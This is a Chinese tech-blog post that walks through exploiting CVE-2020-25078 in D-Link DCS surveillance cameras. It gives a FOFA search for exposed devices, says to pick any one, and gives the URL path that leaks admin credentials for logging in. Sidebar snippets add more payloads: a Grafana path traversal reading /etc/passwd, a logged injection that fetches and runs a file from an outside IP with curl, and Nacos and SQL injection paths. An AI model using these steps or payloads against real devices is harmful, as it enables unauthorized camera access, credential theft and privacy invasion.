D-Link DCS系列监控账号密码信息泄露

最新推荐文章于 2023-11-03 14:42:00 发布
最新推荐文章于 2023-11-03 14:42:00 发布
阅读量1.7k 收藏 6
点赞数 1
文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/121405241
版权

简介:

漏洞编号:CVE-2020-25078

D-Link DCS是网络监控摄像机设备,通过访问特定的URL可以得到账号密码信息,攻击方可以

直接进入利用漏洞得到账户密码直接进入后台获取视频监控页面。

影响版本:

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

漏洞复现:

fofa直接搜索:

app="D_Link-DCS-2530L"

可以看到还是很多的。

随便点进去一个;看到需要认证登录:

 漏洞拼接路径:

/config/getuser?index=0

 

利用得到的账户密码登录即可。

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

Cheng-Ling
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
漏洞复现 D-Link DCS 密码泄露漏洞
失心少年
06-21 410
D-link DCS是一款网络摄像机,工作温度为0-50℃。D-link DCS系统存在密码泄露漏洞,攻击者通过漏洞可以获取后台权限。1.使用poc进行账号密码查看,得到密码登录即可。
D-Link DCS系列监控账号密码信息泄露漏洞(含批量验证poc)
最新发布
weixin_43567873的博客
04-06 135
D-Link DCS系列监控账号密码信息泄露漏洞(含批量验证poc)
CNVD-2021-29075:D-Link DCS-4622 监控账号密码泄露漏洞
Foreverlove112的博客
09-07 1008
CNVD-2021-29075:D-Link DCS-4622 监控账号密码泄露漏洞复现
D-Link DCS系列监控 账号密码信息泄露漏洞
weixin_51387754的博客
11-05 1084
漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/get
D-Link DCS 密码泄露漏洞
薛定谔嘚喵博客
08-30 274
D-link DCS是一款成像色彩为彩色 是一款网络摄像机。D-link DCS系统存在密码泄露漏洞,攻击者通过漏洞可以获取后台权限。
CVE-2020-25078:D-Link DCS系列账号密码信息扩展,通过脚本获取账号密码,可批量
03-30
CVE-2020-25078:D-Link DCS系列账号密码信息扩展,通过脚本获取账号密码,可批量
安全特警D-link.pdf
07-13
安全特警D-link DCS-5300G是一款高级的网络摄像机,设计用于远程监控和音频监听。这款设备的主要特点包括: 1. **独立式网络摄影机**:DCS-5300G能够独立工作,无需依赖其他硬件设备,通过LAN或WLAN接入网络。 2. ...
d-link2760u设置
05-18
**D-Link DCS-2760U设置指南** D-Link DCS-2760U是一款高性能的企业级无线接入点,适用于构建大型网络环境。它提供了高速的无线连接,支持802.11ac标准,可以提供高达1.3Gbps的无线速度。这款设备还具备多种功能,...
DCS-3950系列交换机安装手册.pdf
05-13
DCS-3950-10C系列提供了10个固定接口(8个10/100Base-T固定端口、2个千兆Combo口)。DCS-3950-26C提供了26个固定接口(24个10/100Base-T固定端口、2个千兆COMBO口)。DCS-3950-28C系列提供了28个固定接口(24个10/...
D-Link推出中小企业IP视频监控解决方案
03-04
D-Link推出的中小企业IP视频监控解决方案是针对当前网络技术进步和宽带普及背景下的市场需求而设计的。随着视频监控从传统安防向管理监控和生产经营监控转变,对于覆盖范围广、实施距离远、系统集成及资源共享的需求...
D-Link 路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告.pdf
02-28
近日,国家信息安全漏洞共享平台(CNVD)收录了D-Link DIR系列路由器身份验证信息泄露漏洞和远程命令执行漏洞(CNVD-2017-20002、CNVD-2017-20001)。远程攻击者利用漏洞可获取路由器后台登录凭证并执行任意代码。相关利用代码已在互联网公开,受到影响的设备数量根据标定超过20万台,有可能会诱发大规模的网络攻击
D-Link云摄像头超过120款产品存在漏洞,约40万台设备受影响
weixin_34162695的博客
07-11 249
之前也有过摄像头存在安全漏洞,隐私被泄露出去的事件。这次事件的主角轮到了D-Link云摄像头。一位叫Stephen Ridley的安全研究员发现了D-Link云摄像头漏洞的存在,并且他还发现了超过120款产品存在相同的漏洞。 超过40万D-Link设备可以被在线利用 自从RCE漏洞可以通过网络连接被执行以后,任何存在这一漏洞D-Link设备通过一个pin...
Kyan网络监控设备账号密码泄露漏洞
chaojixiaojingang
04-19 1783
1.漏洞描述 Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。 2.网络资产查找 Fofa:title="platform - Login" 3.POC http://xxx.xxx.xxx.xxx/hosts 4.漏洞复现 1)访问Kyan网络监控设备登录页面 2)访问POC,获取账号密码 3)利用获取的账号密码可直接进入后台 ...
2021年部分漏洞整合+检测工具
weixin_48421613的博客
12-15 3409
2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测 grafana任意文件读取漏洞 漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测 poc: /public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd 页面原型: 漏洞
104.202.60.2/.index.php,web扫描
weixin_42110038的博客
03-27 1228
有几个人长期扫描我的网站= =!我吐了default 敏感目录访问 52.173.33.21 /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 2020-07-28 ...
D-Link DAR-8000操作系统命令注入漏洞(CVE-2023-4542)
weixin_44304678的博客
11-03 398
D-Link DAR-8000是中国友讯(D-Link)公司的上网行为审计网关。该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。D-Link DAR-8000-10版本存在操作系统命令注入漏洞。
2021年网络安全设备漏洞集合
weixin_47536169的博客
07-13 3751
360天擎SQL注入漏洞 描述 fofa title="360新天擎" POC & 利用 /api/dp/rptsvcsyncpoint?ccid=1 360天擎信息泄露 描述 /api/dbstat/gettablessize POC & 利用 Alibaba 阿里巴巴Nacos认证绕过 描述 fofa:title="Nacos" POC & EXP # 添加用户 POST /nacos/v1/auth/users HTTP/1.1 ..
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2179
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
vue config中index,获取ip访问地址
qq_41091678的博客
09-17 1542
'use strict' // Template version: 1.3.1 // see http://vuejs-templates.github.io/webpack for documentation. const path = require('path') const address = require('address'); console.log(address) const network = 'http://' + address .ip() || 'http://localho..
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值